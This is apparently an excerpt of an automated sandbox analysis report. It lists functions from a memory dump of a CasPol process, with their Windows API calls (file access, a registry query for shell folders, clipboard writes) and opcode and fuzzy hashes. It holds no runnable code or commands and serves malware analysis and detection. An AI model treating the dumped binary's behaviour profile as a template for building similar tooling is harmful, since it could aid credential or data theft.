                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                  Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                  Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                  Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                  Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 00415CFE Relevance: 18.1, APIs: 4, Strings: 6, Instructions: 592COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                  • String ID: %$(NULL)$+$-x0$0123456789ABCDEF0123456789abcdef$NULL
                                                                                                                                                                                  • API String ID: 643879872-1412151055
                                                                                                                                                                                  • Opcode ID: efbd6552d042004b9477279b070f5095f427e648a63fbec015caf4f61aae1a40
                                                                                                                                                                                  • Instruction ID: e0cc6b836fff892d006744b0329856caed0b51470de7c61c9c8f9526dc712ed7
                                                                                                                                                                                  • Opcode Fuzzy Hash: efbd6552d042004b9477279b070f5095f427e648a63fbec015caf4f61aae1a40
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD32C0319087918FD721CF18D5807EBBBE1AF95304F19495FE8C497252D378CA8ACB9A
                                                                                                                                                                                  Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                  Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                  Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4218492932-0
                                                                                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                  Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1213725291-0
                                                                                                                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
